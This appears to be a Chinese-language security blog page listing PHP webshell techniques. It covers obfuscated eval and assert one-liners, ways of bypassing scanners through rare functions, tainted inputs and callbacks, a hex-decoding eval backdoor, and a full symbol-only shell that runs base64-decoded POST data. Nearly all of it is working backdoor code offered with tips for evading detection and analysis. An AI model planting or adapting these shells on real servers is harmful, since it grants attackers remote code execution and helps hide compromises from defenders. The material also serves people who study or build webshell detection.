5.1.8. WebShell

HEXBLOG 32 0
广告

5.1.8.1. 常见变形

  • GLOBALS
    • eval($GLOBALS['_POST']['op']);
  • $_FILE
    • eval($_FILE['name']);
  • 拆分
    • eval(${"_PO"."ST"} ['sz']);
  • 动态函数执行
    • $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
    • $a=$_GET['a'];$a($_GET['b']);
  • create_function
    • $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
  • preg_replace
  • 变形
    • str_replace(" ", "e v a l")
  • 进制转化
    • "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
  • 进制运算
    • ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
  • 自增运算
    • $a="a";$a++;
  • 强制类型转换
    • $a='';$a.=[]; // Array
  • 利用文件名
    • __FILE__
  • 注释
    • $a="e"."v"./*-/*-*/"a"./*-*/"l";
  • 反射
    • ReflectionFunction

5.1.8.2. Bypass

  • 基于少见函数
    • mb_eregi_replace('.*',$_GET[1],'','e');
    • set_error_handler + trigger_error
  • 基于污染传播
    • putenv($_GET["c"]);eval(getenv('path'));
    • parse_str
    • parse_url
    • extract
    • token_get_all
    • define
  • 基于少见源
    • $a = filter_input(INPUT_GET,'c');
    • eval(end(getallheaders()));
    • get_defined_vars
    • getallheaders
    • get_meta_tags
    • phpinfo
    • 外部变量 / 文件信息
    • 重载 toString

5.1.8.3. 字符串变形函数

  • base64_decode
  • base64_encode
  • str_replace
  • str_rot13
  • strtok
  • strtolower
  • strtoupper
  • strtr
  • substr
  • substr_replace
  • trim
  • ucfirst
  • ucwords

5.1.8.4. 回调函数

  • array_filter
  • array_map
  • array_reduce
  • array_walk
  • array_walk
  • array_walk_recursive
  • call_user_func
  • call_user_func_array
  • filter_var
  • filter_var_array
  • preg_replace_callback
  • register_tick_function
  • registregister_shutdown_function
  • uasort
  • uksort

5.1.8.5. 加解密函数

  • mcrypt_encrypt
  • openssl_encrypt

5.1.8.6. 其他执行方式

  • FFI
  • SimpleXML
  • SimpleXMLElement

5.1.8.7. 自定义函数

使用自定义的加解密函数,在一定程度上可以绕过一些防护软件的查杀,下面的代码是一个基于十六进制的执行的简单例子。

$string = '';
$password = 'password';
if(isset($_POST[$password])){
    $hex = $_POST[$password];
    for($i = 0; $i < strlen($hex) - 1; $i += 2) {
        $string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    }
}
eval($string);

5.1.8.8. 特殊字符Shell

PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。

<?=`{${~"\xa0\xb8\xba\xab"}[~"\xa0"]}`;
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
$_=[];
[email protected]"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___(base64_decode($_[_]));

5.1.8.9. 检测对抗

  • 基于混淆影响程序分析
  • 基于动态变量影响程序执行
  • 抛出异常打断数据流分析
  • 基于反射打断数据流分析
  • 基于引用传递打断数据流分析

发表评论 取消回复
表情 图片 链接 代码

分享